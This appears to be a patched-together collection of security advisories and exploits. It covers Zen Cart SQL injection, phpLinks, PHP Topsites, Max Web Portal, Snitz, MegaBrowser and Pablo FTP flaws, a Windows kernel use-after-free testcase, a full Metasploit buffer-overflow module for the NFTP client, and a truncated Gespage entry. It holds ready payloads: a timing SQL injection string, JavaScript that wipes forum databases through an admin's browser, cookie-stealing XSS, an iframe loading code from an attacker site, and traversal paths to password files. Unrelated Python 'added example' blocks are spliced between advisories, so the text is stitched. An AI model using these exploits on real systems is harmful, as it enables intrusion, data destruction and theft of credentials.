            // while ( list( $key, $val ) = each($_POST['products_id']) ) {
            if ($val > 0) {
                $adjust_max = false;
                $prodId = $key;   // attacker-controlled array key, later used unsanitized by in_cart_mixed()
                $qty = $val;
                $add_max = zen_get_products_quantity_order_max($prodId);
                $cart_qty = $this->in_cart_mixed($prodId);
                // ... remainder of the function not reproduced in the advisory
The above code comes from the actionMultipleAddProduct function in the shopping_cart class, and unlike the first issue I discussed introduces a highly exploitable SQL Injection issue in to Zen Cart. The root of the problem is that the in_cart_mixed function uses $prodId in a query without any sanitation.
products_id[-99' UNION SELECT IF(SUBSTRING(admin_pass,1, 1) = CHAR(97), BENCHMARK(1000000, MD5(CHAR(1))), null),2 FROM zencart_admin/*]
It's possible for an attacker to submit a request to the "multiple_products_add_product" action with a products_id like the one above (remember to set the value to one if you wish to test this) and enumerate database contents based on query response time. Other attacks may also be possible depending on server configuration; for example, if an attacker can SELECT INTO OUTFILE, this issue can allow remote PHP code execution.
Solution:
The Zen Cart developers were very prompt and professional in releasing a fix for the previously mentioned issues. An updated version, as well as patches can be found at the following location.
http://www.zen-cart.com/forum/showthread.php?p=604473
Credits:
James Bercegay of the GulfTech Security Research Team
P-Synch Multiple Vulnerabilities
Vendor: M-Tech Identity Management Solutions
Product: P-Synch
Version: <= 6.2.5
Website: http://www.psynch.com/
BID: 7740 7745 7747
Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.
Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Solution:
Upgrade to the latest version of P-Synch Password Management.
Credits:
James Bercegay of the GulfTech Security Research Team.
phpLinks Multiple Vulnerabilities
Vendor: destiney.com
Product: phpLinks
Version: <= 2.1.2
Website: http://phplinks.sourceforge.net/
BID: 6632 6633
Description:
phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link farm or search engine. phpLinks has multilevel site categorization, infinite threaded search capabilities and more.
Search Script Injection Vulnerability:
phpLinks is prone to HTML injection due to a vulnerability in the search feature. Search queries are not sufficiently sanitized of HTML and script code. These search queries may potentially be displayed to other users when the most popular searches are viewed. If an attacker includes malicious HTML or script code in these queries, it is possible that the attacker-supplied code may be rendered in the web client software of other users.
Add Site Script Injection Vulnerability:
phpLinks does not sufficiently sanitize HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added.
Solution:
https://www.securityfocus.com/bid/6632/solution/
https://www.securityfocus.com/bid/6633/solution/
Proof Of Concept Exploit:
phpLinks Arbitrary Command Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team.
- https://www.securityfocus.com/bid/6632/info
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it.
<iframe src=http://blah/death.html></iframe>
Below is the code for the called file "death.html"
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
// this resets the database
window.open(BaseURL + '/admin/reset.php?reset_in=&reset_out=&search_terms=&referrers=&submit=');
function Waste()
{
    while (i) {
        i++;
        window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i + '&sure=Yes');
    }
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------
As you can see, when that code is run (by a logged-in admin validating sites), the database is in a lot of cases going to be left empty. By the way, dbtable=links can be changed to dbtable=temp in order to affect sites not yet approved. On the other hand, you can also add users to the database and more. Take the following code for example:
<iframe src=http://blah/life.html></iframe>
Below is the code for the called file "life.html":
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
    while (i) {
        i++;
        window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
            + '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
            + '3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t.' + i
            + '&UserName=12345' + i
            + '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
    }
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------
- https://www.securityfocus.com/bid/6633/info
PHP Topsites Multiple Vulnerabilities
Vendor: iTop 10
Product: PHP Topsites
Version: <= 2.2
Website: http://www.itop10.net/
BID: 6621 6622 6623 6625
Description:
PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.
Script Injection Vulnerability:
An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. This issue will occur when an unsuspecting administrator loads the submitted description. This vulnerability also affects the 'edit.php' script.
Cross Site Scripting Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. This issue can be exploited by constructing a malicious URL containing embedded script code as a 'help.php' parameter. When an unsuspecting user follows the link sensitive information, such as cookie-based authentication credentials may be obtained by the attacker.
Plaintext Password Weakness:
A weakness has been discovered in PHP TopSites. It has been reported that user's passwords are stored in plaintext and thus are visible to TopSites administrators. This poses a security risk as TopSite script users may use the same passwords on other systems.
SQL Injection Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in database information being disclosed to an attacker.
Solution:
Upgrade to the current version of php topsites
Proof Of Concept Exploit:
iTop10.net phpTopsites Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team. And The CyberArmy ACAT Team.
- https://www.securityfocus.com/bid/6625/info
http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber--
- https://www.securityfocus.com/bid/6623/info
- https://www.securityfocus.com/bid/6622/info
http://www.example.com/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
- https://www.securityfocus.com/bid/6621/info
<body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">
<body onLoad="window.open('http://attackerswebsite/launcher.htm')">
WinMX Design Error
Vendor: Frontcode Technologies
Product: WinMX
Version: <= 2.6
Website: http://www.winmx.com/
BID: 7771
Description:
WinMX 2.6 is an older version of the popular file sharing client WinMX. While the current version is 3.31, 2.6 still remains quite popular, especially amongst users on private networks. I believe this is largely due to the fact that 2.6 does not have the option to output .wsx files (WinMX server list files). This helps keep the addresses of private OpenNap servers out of the hands of uninvited users (amongst other reasons).
Problem:
The problem with WinMX 2.6 is that it provides essentially no password protection. This can be exploited both locally and remotely. Again, I think all of us have seen the bad habit most people have of using the same password for multiple accounts.
Local Exploitation:
There are several ways to exploit this issue locally. One is to simply edit a particular server, upon which the username and password are presented in plaintext; the other is to open the nservers.dat file in the WinMX directory.
Remote Exploitation:
Even though the passwords are encrypted by such servers as SlavaNap etc, they are passed to the server in plaintext, so any malicious server owner with a packet sniffer can exploit this vuln.
Conclusion:
I realized this issue back when 2.6 was the current release, but never reported it because very shortly thereafter a new version of WinMX was available. However, with the substantial number of 2.6 users still around I felt it was best that this vulnerability become official, as there is nothing about it on Google etc. that I was able to find. So to anyone using 2.6 I offer this advice: at the very least, do not use a password for WinMX 2.6 that you use for other accounts. Hope this helps some of the 2.6 users out. Cheers
Solution:
Upgrade to the latest version of WinMX
Credits:
James Bercegay of the GulfTech Security Research Team.
FTP Service Multiple Vulnerabilities
Vendor: Pablo Software Solutions
Product: FTP Service
Version: <= 1.2
Website: http://www.pablovandermeer.nl/ftp_service.html
BID: 7799 7801
Description:
FTPService.exe is a service-version of Pablo's FTP Server. This service enables you to have the FTP server active even when you're not logged into Windows.
Anonymous Access
The anonymous account is by default set to have download access to anything in the C:\ directory. While this can be disabled by simply deleting the anonymous account, it poses a serious threat for anyone not aware of the problem.
ftp://somewhere/windows/repair/sam
In conclusion this application is totally open to complete compromise by default. Vendor was notified and plans on releasing a fix soon.
Plaintext Password Weakness:
User info is stored in users.dat in plaintext. If the anonymous account is present (it is by default), the entire FTP server can be compromised by simply downloading that file:
ftp://somewhere/program files/pablo's ftp service/users.dat
Solution:
Upgrade your version of Pablo FTP Service.
Credits:
James Bercegay of the GulfTech Security Research Team.
Max Web Portal Multiple Vulnerabilities
Vendor: Max Web Portal
Product: Max Web Portal
Version: <= 1.30
Website: http://www.maxwebportal.com
BID: 7837
Description:
MaxWebPortal is a web portal and online community system which includes advanced features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. Easy-to-use and powerful user interface allows members to add news, content, write reviews and share information among other registered users.
Search XSS Vulnerability:
The Max Web Portal search utility is vulnerable to cross site scripting attacks. All an attacker has to do is break out of the input tags and enter their code of choice, such as JS or VBS. Below is an example of this vulnerability.
search.asp?Search="><script>alert(document.cookie)</script>
Remember this vuln as I will later explain how it can be used to aide an attacker to compromise user and admin accounts.
Hidden Form Field weakness:
The Max Web Portal system seems to rely on hidden form fields quite heavily. This is not really a problem if done securely. However, any user can perform some admin actions by exploiting the use of these hidden fields. For example, an attacker can deface a Max Web Portal site by clicking the link to start a new topic, saving the html file offline, and making a few changes. By adding the following to the form, any post an attacker makes will show up on the front page as a news item. (credits to pivot for finding this one :) )
A field with value=1 name=news
And this will also lock the topic
A field with name="lock" value="1"
Unfortunately this vuln can also be exploited by the scum of the earth (spammers :( ) Below is an example of how a user can send a private message to all members of the particular Max Web Portal driven site
A field with name="allmem" value="true"
There may be other vulns like this that can be exploited. We however quit bothering with looking after these were found. heh
Cookie Authentication Bypass Vulnerability:
Now this is where the earlier XSS vuln could come in very handy to an attacker. Basically, by changing certain values in the cookie of a Max Web Portal site an attacker can assume the identity of anyone, even an admin. This is only possible if you have the encrypted password of a user, but by using the above XSS vuln or other methods this can be accomplished quite easily. All an attacker has to do is log in as themselves to obtain a valid session id. Then, without logging out, close the browser and change their name and encrypted pass in the cookie to those of the identity they wish to assume. When they return to the site it will recognize them as the compromised user.
Database Compromise Vulnerability:
This is taken directly from the Max Web Portal readme file explaining the recommended post installation procedure.
"Remember to change the default admin password by clicking on the Profile link in your Control Panel. For additional security, it is recommended to change your database name. example: neptune.mdb"
This is not safe, as anyone with a CGI scanner can modify their list to find a Max Web Portal database. By default the database is located at this URL:
/database/db2000.mdb
And while it should be removed and placed in a non-accessible directory, a lot of the time it isn't :( This is definitely serious, as you do not need to decrypt the pass for it to be of any use to you, as I demonstrated earlier.
Password Reset Vulnerability:
This is by far the most serious vuln of them all. While the cookie poisoning vuln will let you log in as anyone, your access is somewhat limited. However, by requesting a forgotten password, an attacker can save the password reset page offline, edit the member id in the source code to the id number of the desired victim, and reset their password to one of their liking, no questions asked. Here is a modified example.
MaxWebPortal Proof of Concept Exploit
This leads to total compromise of the web portal system. An attacker can even write a script in a matter of minutes to reset the entire database to a pass of their liking. I wrote a script like this during the research of this product but will not be releasing it to the public as I'm sure it will only be abused.
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.
MegaBrowser Multiple Vulnerabilities
Vendor: Quality Programming Corporation
Product: MegaBrowser
Version: <= 0.71b
Website: http://www.megabrowser.com
BID: 7802 7803
Description:
Megabrowser is a free standalone program that enables you to host websites and FTP sites by utilizing its powerful advanced peer-to-peer features. You can now host websites and FTP sites without paying any hosting fees. Simply store your sites in the directories of your choice on your laptop or personal computer.
Directory Traversal Vulnerability:
The MegaBrowser HTTP server is vulnerable to a directory traversal vulnerability which allows access to any file on the system, as well as directory listing of the root web directory.
http://www.someplace.com/../../../../../WINNT/repair/sam
http://www.someplace.com/../
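The check MegaBrowser is missing, as an added example in Python (not the product's code): the naive join that reproduces the traversal beside a resolver that percent-decodes, unifies separators, normalizes and then re-checks containment against the real document root. The document root "/var/www" and the request paths are constructed for the example.

```python
import os
import posixpath
from urllib.parse import unquote, urlsplit


def naive_join(docroot, raw_path):
    """The broken approach: glue the request path onto the document root and serve the result.
    '/../../../../../WINNT/repair/sam' walks straight out of docroot."""
    return os.path.join(docroot, raw_path.lstrip("/"))


def resolve_request_path(docroot, raw_path):
    """Map the path of an HTTP request line onto docroot; return None if it would escape.

    Order matters: decode, unify separators, normalize, then re-check on the real filesystem.
    """
    # 1. Percent-decode first, so "%2e%2e/" cannot slip past the ".." check as literal text
    path = unquote(urlsplit(raw_path).path)
    # 2. Windows servers accept "\" as a separator; treat it exactly like "/"
    path = path.replace("\\", "/")
    # 3. Collapse "." and ".." relative to the root; anything still starting with ".." climbed out
    rel = posixpath.normpath(path.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        return None
    # 4. Resolve symlinks and re-check containment: a link inside docroot that points outside
    #    is caught here rather than by the string check above
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("/index.html", "/../../../../../WINNT/repair/sam", "/%2e%2e/%2e%2e/etc/passwd"):
        print(p, "->", resolve_request_path("/var/www", p))
```

Note that step 3 deliberately normalizes the path as relative: posixpath.normpath("/../x") collapses silently to "/x" because "/.." is "/" on POSIX, which would hide the climb rather than expose it.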
FTP User Enumeration Vulnerability:
While not as serious as the previously mentioned vuln, this still poses a threat as it may allow an attacker to harvest a list of valid FTP usernames on the system.
user blah
530 User can't log in
user anonymous
331 Anonymous access allowed, send identity (e-mail name) as password
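The exchange above, driven as an added example that is not MegaBrowser's code: a constructed stand-in FTP server that answers USER with 331 for known names and 530 for unknown ones, and a client that turns that difference into a username oracle. The account names are constructed; the reply texts are the ones quoted above.

```python
import socket
import threading

# Constructed account list for the stand-in server; nothing here is the product's code
KNOWN_USERS = {"anonymous", "administrator"}


def fake_ftp_server(known_users):
    """Stand-in for a server that answers USER differently for valid and invalid names.

    Returns (port, stop); call stop() to shut the listener down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # ephemeral port
    srv.listen(5)
    srv.settimeout(0.2)
    stopping = threading.Event()

    def serve():
        while not stopping.is_set():
            try:
                conn, _addr = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(2.0)
                conn.sendall(b"220 Service ready\r\n")
                line = conn.makefile("rb").readline().decode(errors="replace").strip()
                verb, _sep, name = line.partition(" ")
                if verb.upper() != "USER" or name not in known_users:
                    conn.sendall(b"530 User can't log in\r\n")      # unknown name: refused at once
                elif name == "anonymous":
                    conn.sendall(b"331 Anonymous access allowed, send identity (e-mail name) as password\r\n")
                else:
                    conn.sendall(b"331 Password required\r\n")      # known name: asked for a password
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stopping.set


def probe_user(host, port, username, timeout=2.0):
    """Send USER <username> and return the numeric reply code."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        reader = s.makefile("rb")
        reader.readline()                                   # 220 banner
        s.sendall(f"USER {username}\r\n".encode())
        reply = reader.readline().decode(errors="replace")
    return int(reply[:3])


def enumerate_users(host, port, candidates):
    """Return the candidates whose USER reply differs from the 530 an unknown name gets."""
    return [name for name in candidates if probe_user(host, port, name) != 530]


if __name__ == "__main__":
    port, stop = fake_ftp_server(KNOWN_USERS)
    print(enumerate_users("127.0.0.1", port, ["blah", "anonymous", "administrator", "guest"]))
    stop()
```

The fix on the server side is to answer 331 to every USER and only fail after PASS, so the reply code no longer depends on whether the name exists.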
Solution:
Vendor contacted, but never replied. No known solution.
Credits:
James Bercegay of the GulfTech Security Research Team.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6
Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to keep references to freed WND structures.
There are two interesting background posts on CS_OWNDC and CS_CLASSDC here:
https://blogs.msdn.microsoft.com/oldnewthing/20060601-06/?p=31003
https://blogs.msdn.microsoft.com/oldnewthing/20060602-00/?p=30993
Here is a minimal testcase:
$ cat dccache.c
#include <windows.h>

#pragma comment(lib, "user32")

int main(int argc, char **argv) {
    WNDCLASSEX WindowClass = {0};
    HWND WindowA, WindowB, WindowC;
    ATOM Atom;

    WindowClass.cbSize = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc = DefWindowProc;
    WindowClass.lpszClassName = "Class";

    Atom = RegisterClassEx(&WindowClass);

    WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    // Switch the shared class to CS_CLASSDC after the first window already exists
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
    WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    // Populate the DC cache with an entry for WindowA, then flip the class style again
    GetDC(WindowA);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
    WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    return 0;
}
This might take a while to crash though, something has to cause the list to be traversed (e.g. a new window opens) after the freed memory has changed. It can also crash in some very strange places. We can speed the process up by trying to get the allocation ourselves.
First I need to know the size of a WND structure. If you look at the call to HMAllocObject() in win32kfull!xxxCreateWindowEx, you can see it's 240 bytes:
.text:00081BCC _xxxCreateWindowEx@68 proc near
...
.text:00081EE2 push 240 ; _DWORD
.text:00081EE7 push 1 ; _DWORD
.text:00081EE9 push [ebp+var_12C] ; _DWORD
.text:00081EEF push ebx ; _DWORD
.text:00081EF0 call ds:__imp__HMAllocObject@16 ; HMAllocObject(x,x,x,x)
A well-known trick to get arbitrary sized allocations from the desktop heap is to use SetWindowText(), you just create a WCHAR string of the required length - good enough for testing.
e.g. SetWindowTextW(Window, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...");
So my plan is to create a thread to trigger the free, and then try to steal the allocation. See the testcase attached for my code.
This reliably crashes Windows 10 with version 10.0.15063.674, the crash looks like this:
eax=00410041 ebx=00000010 ecx=95423580 edx=95423580 esi=99464440 edi=954004d0
eip=93fb40d8 esp=9dba78f0 ebp=9dba7910 iopl=0 nv up ei pl nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207
win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba:
93fb40d8 8b403c mov eax,dword ptr [eax+3Ch] ds:0023:0041007d=????????
0: kd> kv
# ChildEBP RetAddr Args to Child
00 9dba7910 93fb2722 00000000 0c6775a3 9dba7b80 win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba (FPO: [Non-Fpo])
01 9dba7afc 93fd1916 0000c1ac 9dba7b74 00000000 win32kfull!xxxCreateWindowEx+0xb56 (FPO: [Non-Fpo])
02 9dba7bc8 81d97397 80000000 0000c1ac 0000c1ac win32kfull!NtUserCreateWindowEx+0x2b0 (FPO: [Non-Fpo])
03 9dba7bc8 77104350 80000000 0000c1ac 0000c1ac nt!KiSystemServicePostCall (FPO: [0,3] TrapFrame @ 9dba7c14)
04 0073f0b8 7497485a 74bae418 80000000 0000c1ac ntdll!KiFastSystemCallRet (FPO: [0,0,0])
05 0073f0bc 74bae418 80000000 0000c1ac 0000c1ac win32u!NtUserCreateWindowEx+0xa (FPO: [17,0,0])
06 0073f394 74badcff 0073f3e0 00000000 80000000 USER32!VerNtUserCreateWindowEx+0x22b (FPO: [Non-Fpo])
07 0073f468 74baeaf8 00cc1010 00000000 80000000 USER32!CreateWindowInternal+0x153 (FPO: [Non-Fpo])
08 0073f4a8 00cb1173 00000000 0000c1ac 00cc1010 USER32!CreateWindowExA+0x38 (FPO: [Non-Fpo])
So let's dump the DC Cache and see what it looks like, an entry looks something like:
typedef struct _DCE {
    PDCE   pdceNext;
    HANDLE hDC;
    PWND   pwndOrg;
    PWND   pwndClip;
    ...
} DCE, *PDCE;
# Make $t0 gpDispInfo->pdceFirst
0: kd> r $t0=poi(poi(win32kbase!gpDispInfo)+8)
# Now dump the whole list:
0: kd> .while (@$t0) { .printf "dce %p ->pwndOrg %p\n",@$t0,poi(@$t0+8); r @$t0=poi(@$t0) }
dce 99464440 ->pwndOrg 95423580
dce 922140e8 ->pwndOrg 00000000
dce 9239d638 ->pwndOrg 00000000
dce 9239beb0 ->pwndOrg 00000000
dce 99510540 ->pwndOrg 9541ede8
dce 92274178 ->pwndOrg 954004d0
dce 9223d2b0 ->pwndOrg 954004d0
dce 922050e8 ->pwndOrg 945504d0
So my theory is that one of these WND pointers is actually a bad reference, and look at this:
0: kd> du 95423580
95423580 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
954235c0 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
95423600 "AAAAAAAAAAA"
There is the text I set via SetWindowText().
(The testcase I sent Microsoft triggered a couple of other BSOD I want fixed as well. I'm hoping whoever gets assigned this bug will just fix them, they're dead easy oneline fixes).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43446.zip
Snitz Forums 2000 Multiple Vulnerabilities
Vendor: Snitz Communications
Product: Snitz Forums 2000
Version: <= 3.4.0.3
Website: http://www.snitz.com
BID: 7922 7924 7925
CVE: CAN-2003-0492 CAN-2003-0493 CAN-2003-0494
Description:
Snitz Forums is a full-featured UBB-style ASP discussion board application. New features in version 3.3: Complete Topic/Post Moderation, Topic Archiving, Subscribe to Board / Category / Forum / Topic, Improved unsubscribe, Short(er) urls, Category and Forum ordering, and Improved Members-page. And like always, upgrading of the database is done for you by the setup script.
Search XSS Vulnerability:
The Snitz search feature is vulnerable to XSS, which can aid an attacker in stealing cookies and thus compromising the account, as described below.
search.asp?Search="><script>alert(document.cookie)</script>
Cookie Authentication Bypass Vulnerability:
In order to steal another user's identity, all an attacker needs to know is their encrypted password. This is not very hard to obtain using the XSS described above, or other methods. Once an attacker has this info, all they have to do is log in to their normal account to get a valid session id, close the browser, replace their username and encrypted pass with those of the victim, and return to the site, where they will be recognized as the victim.
Password Reset Vulnerability:
This is the most serious of the vulns, as it requires no real effort and leaves the entire Snitz forum open to attack. All an attacker has to do is request a forgotten password, save the password reset page offline, edit the member id to the desired member id, and submit the form. The member's password will then be reset to that of the attacker's choosing.
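The two design flaws described for Snitz here and for Max Web Portal above (a cookie that carries the username and encrypted password next to a session id that is not tied to them, and a reset form that posts the member id it acts on), as an added example in Python that is not the code of either product. The member table, the sha1 "encrypted password" and the session stores are constructed; the vulnerable functions reproduce the behaviour the advisories describe, and the fixed ones show the usual remedy: an opaque session id mapped to the user server-side, and a reset that takes its identity from a single-use token rather than from the form.

```python
import hashlib
import hmac
import secrets


def pw_hash(password):
    # Stands in for the "encrypted password" the advisories refer to (constructed; the boards'
    # real hashing scheme is not the point here)
    return hashlib.sha1(password.encode()).hexdigest()


# Constructed member table: name -> {id, hash}
USERS = {
    "admin":   {"id": 1, "pw_hash": pw_hash("correct horse")},
    "mallory": {"id": 7, "pw_hash": pw_hash("mallory")},
}

# ---- Vulnerable design: identity lives in the cookie, the session id is not tied to it -------
SESSIONS_VULN = set()


def login_vuln(name, password):
    user = USERS.get(name)
    if not user or not hmac.compare_digest(pw_hash(password), user["pw_hash"]):
        return None
    sid = secrets.token_hex(8)
    SESSIONS_VULN.add(sid)
    return {"sessionid": sid, "name": name, "pass": user["pw_hash"]}


def whoami_vuln(cookie):
    # A valid session id only proves that *someone* logged in; name and hash are then read from
    # the cookie, so anyone holding a victim's hash can swap them in
    if cookie.get("sessionid") not in SESSIONS_VULN:
        return None
    user = USERS.get(cookie.get("name"))
    if user and hmac.compare_digest(user["pw_hash"], cookie.get("pass", "")):
        return cookie["name"]
    return None


def reset_password_vuln(form):
    # The "forgot password" form posts the member id it was rendered for; edit it offline and
    # any account gets the new password
    for name, user in USERS.items():
        if user["id"] == int(form["member_id"]):
            user["pw_hash"] = pw_hash(form["new_password"])
            return name
    return None


# ---- Fixed design: opaque session id mapped to the user server-side; reset bound to a token ---
SESSIONS_FIXED = {}     # sid -> name
RESET_TOKENS = {}       # token -> name; single use, delivered out of band (e-mail)


def login_fixed(name, password):
    user = USERS.get(name)
    if not user or not hmac.compare_digest(pw_hash(password), user["pw_hash"]):
        return None
    sid = secrets.token_hex(16)
    SESSIONS_FIXED[sid] = name
    return {"sessionid": sid}          # the cookie carries nothing the client could usefully edit


def whoami_fixed(cookie):
    return SESSIONS_FIXED.get(cookie.get("sessionid"))


def issue_reset_token(name):
    token = secrets.token_urlsafe(24)
    RESET_TOKENS[token] = name
    return token


def reset_password_fixed(form):
    # Identity comes from the server-side token record, never from a posted member id
    name = RESET_TOKENS.pop(form.get("token", ""), None)
    if name is None:
        return None
    USERS[name]["pw_hash"] = pw_hash(form["new_password"])
    return name
```

In the fixed variant the database leak described for Max Web Portal also loses most of its value: a stolen hash no longer logs anyone in, because nothing the client sends is compared against it after login.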
Proof Of Concept:
Snitz Forums 2000 Proof Of Concept
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ayukov NFTP FTP Client Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
        Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
        is possible to cause a denial-of-service condition on the FTP client, or arbitrary remote
        code execution under the context of the user if successfully exploited.
      },
      'Author'         =>
        [
          'Berk Cem Goksel', # Original exploit author
          'Daniel Teixeira', # MSF module author
          'sinn3r'           # RCA, improved module reliability and user exp
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-15222'],
          [ 'EDB', '43025' ],
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00\x01\x0a\x10\x0d",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'SRVHOST' => '0.0.0.0',
        },
      'DisclosureDate' => 'Oct 21 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
      ])
  end

  def exploit
    srv_ip_for_client = datastore['SRVHOST']
    if srv_ip_for_client == '0.0.0.0'
      if datastore['LHOST']
        srv_ip_for_client = datastore['LHOST']
      else
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
      end
    end
    srv_port = datastore['SRVPORT']
    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
    super
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    print_status("#{client.peerhost} - connected")

    # Let the client log in
    client.get_once
    print_status("#{client.peerhost} - sending 331 OK")
    user = "331 OK.\r\n"
    client.put(user)

    client.get_once
    print_status("#{client.peerhost} - sending 230 OK")
    pass = "230 OK.\r\n"
    client.put(pass)

    # It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
    # is visible from the user's command prompt, which would make the buffer overflow attack too
    # obvious.
    sploit = "\x20"*4116
    sploit << [target.ret].pack('V')
    sploit << make_nops(10)
    sploit << payload.encoded
    sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
    sploit << "\r\n"

    print_status("#{client.peerhost} - sending the malicious response")
    client.put(sploit)

    client.get_once
    pwd = "257\r\n"
    client.put(pwd)
    client.get_once
  end
end
# [CVE-2017-7997] Gespage SQL Injection vulnerability
## Description
Gespage is a web solution providing a printer portal. Official Website:
http://www.gespage.com/
The web application does not properly filter several parameters sent by users, allowing authenticated SQL code injection (stacked queries with a trailing comment).

These vulnerabilities could allow attackers to retrieve / update data from the database through the application.
**CVE ID**: CVE-2017-7997
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 8.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
### Proof of Concept (dumping database data)
The parameters of these following pages are vulnerable:
* Page: http://URL/ges/webapp/users/prnow.jsp
Parameter: show_prn
HTTP Method: Post
* Page: http://URL/ges/webapp/users/blhistory.jsp
